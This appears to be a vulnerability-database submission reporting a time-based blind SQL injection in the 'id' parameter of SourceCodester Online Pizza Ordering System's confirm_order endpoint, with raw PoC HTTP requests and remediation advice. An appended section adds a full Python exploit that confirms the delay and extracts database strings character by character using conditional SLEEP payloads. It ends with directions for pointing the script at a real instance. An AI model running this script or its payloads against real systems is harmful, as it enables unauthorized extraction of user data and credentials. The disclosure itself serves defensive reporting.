Submission #216885: SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order'

Info

Title: SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order'

Description:

Affected Software: SourceCodester Online Pizza Ordering System v1.0
https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391

Tested On: Ubuntu Server 22.04.3 LTS

Affected URL: http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order

Affected Parameter: id

Request (benign, as issued by the 'view order' function):

POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

id=1

Proof of Concept (time-based blind: the response is delayed by roughly 15 seconds when the injected subquery is executed):

POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)

Content-Length must match the injected body (51 bytes for the payload shown); if it is left at the benign request's value, the server reads only the first bytes and the injection never reaches the query. Confirm the finding by comparing the response time of the PoC request against the benign request rather than by looking at the response body, which is identical in both cases.

Impact: The SQL injection gives unauthorized access to restricted data such as user information and credentials.

Summary: An authenticated remote SQL injection vulnerability exists in SourceCodester Online Pizza Ordering System v1.0. It is reachable through the POST request that /admin/ajax.php?action=confirm_order receives from the 'view order' function of /admin/index.php?page=orders, and requires a valid admin session (the Cookie header above). Because the 'id' parameter is placed into the SQL statement without validation or parameterization, a specially crafted request that manipulates 'id' leads to SQL injection, allowing an attacker to read restricted data and extract the underlying database. Remediation: cast 'id' to an integer before use, or bind it with a prepared statement.
User: simon.davis8080 (UID 54983)
Submitted: 05/10/2023 10:30 (3 years ago)
Moderated: 05/10/2023 12:01 (2 hours later)
Status: accepted
VulDB entry: 241384 [SourceCodester Online Pizza Ordering System 1.0 ajax.php?action=confirm_order ID sql injection]
Points: 17
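The PoC above only shows that the delay fires. The following script is an added example, not the submitter's code and not part of the advisory: it automates the timing check for the 'id' parameter and goes one step beyond the PoC by extracting a value character by character with a conditional SLEEP (IF/ASCII/SUBSTRING), which is the standard way to turn a time-based blind injection into data. The TARGET URL and PHPSESSID cookie are the advisory's placeholders and must be replaced with lab values; the FakeTarget class and its sample data are constructed so the script runs offline, and the 0.8 * delay threshold is an assumption that should be tuned to the network's jitter.

```python
import re
import time
import urllib.error
import urllib.parse
import urllib.request

# Placeholders copied from the advisory; point them at your own lab instance.
TARGET = "http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order"
COOKIE = "PHPSESSID=xxxxxxxxxxxxxxxxx"


def build_payload(order_id: int, condition: str) -> str:
    """Form-encode the POST body; `condition` is a MySQL scalar subquery appended to `id`."""
    return urllib.parse.urlencode({"id": f"{order_id} AND ({condition})"})


def decode_id(body: str) -> str:
    """What PHP's $_POST['id'] would hold for this body."""
    return urllib.parse.parse_qs(body).get("id", [""])[0]


def delay_expr(seconds: int) -> str:
    """Unconditional delay, same shape (and alias) as the advisory's PoC."""
    return f"SELECT 5605 FROM (SELECT(SLEEP({seconds})))UTXE"


def cond_delay_expr(sql_expr: str, pos: int, threshold: int, seconds: int) -> str:
    """Delay only if character `pos` of `sql_expr` has an ASCII code above `threshold` (beyond the PoC)."""
    return f"SELECT IF(ASCII(SUBSTRING(({sql_expr}),{pos},1))>{threshold},SLEEP({seconds}),0)"


def http_sender(url: str = TARGET, cookie: str = COOKIE, timeout: float = 60.0):
    """Return send(body) -> elapsed seconds against a real target (needs network and a valid session)."""
    headers = {"Content-Type": "application/x-www-form-urlencoded",
               "X-Requested-With": "XMLHttpRequest", "Cookie": cookie}

    def send(body: str) -> float:
        req = urllib.request.Request(url, data=body.encode(), headers=headers, method="POST")
        start = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                resp.read()
        except urllib.error.HTTPError:
            pass  # an error status still carries the timing signal
        return time.monotonic() - start

    return send


def is_time_vulnerable(send, order_id: int = 1, delay: int = 5, trials: int = 2) -> bool:
    """Compare the slowest benign response with the fastest injected one (assumed 0.8*delay margin)."""
    benign = urllib.parse.urlencode({"id": str(order_id)})
    baseline = max(send(benign) for _ in range(trials))
    injected = min(send(build_payload(order_id, delay_expr(delay))) for _ in range(trials))
    return injected - baseline >= 0.8 * delay


def extract_string(send, sql_expr: str, order_id: int = 1, delay: int = 3, max_len: int = 64) -> str:
    """Recover `sql_expr` one character at a time by binary search over its ASCII code."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            body = build_payload(order_id, cond_delay_expr(sql_expr, pos, mid, delay))
            if send(body) >= 0.8 * delay:
                lo = mid + 1  # code > mid
            else:
                hi = mid      # code <= mid
        if lo == 0:           # SUBSTRING past the end yields '' and ASCII('') is 0
            break
        result += chr(lo)
    return result


class FakeTarget:
    """Constructed stand-in for the vulnerable endpoint so the script runs offline.
    It evaluates only the payload shapes built above and returns a simulated elapsed time."""
    _cond = re.compile(r"ASCII\(SUBSTRING\(\((.+?)\),(\d+),1\)\)>(\d+),SLEEP\((\d+)\)")
    _plain = re.compile(r"SLEEP\((\d+)\)")

    def __init__(self, data: dict, vulnerable: bool = True, base_latency: float = 0.05):
        self.data, self.vulnerable, self.base = data, vulnerable, base_latency
        self.requests = 0

    def __call__(self, body: str) -> float:
        self.requests += 1
        value = decode_id(body)
        if not self.vulnerable:
            return self.base
        m = self._cond.search(value)
        if m:
            expr, pos, thr, secs = m.group(1), int(m.group(2)), int(m.group(3)), int(m.group(4))
            v = self.data.get(expr, "")
            code = ord(v[pos - 1]) if pos <= len(v) else 0
            return self.base + (secs if code > thr else 0)
        m = self._plain.search(value)
        return self.base + (int(m.group(1)) if m else 0)


if __name__ == "__main__":
    target = FakeTarget({"user()": "opos@localhost"})  # constructed sample data
    print("vulnerable:", is_time_vulnerable(target))
    print("user():", extract_string(target, "user()"), "in", target.requests, "requests")
```

Against a real instance, swap `FakeTarget(...)` for `http_sender()` and pass a valid admin PHPSESSID; each character costs about seven requests, and the delay should be raised on noisy links because the oracle is purely timing-based.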
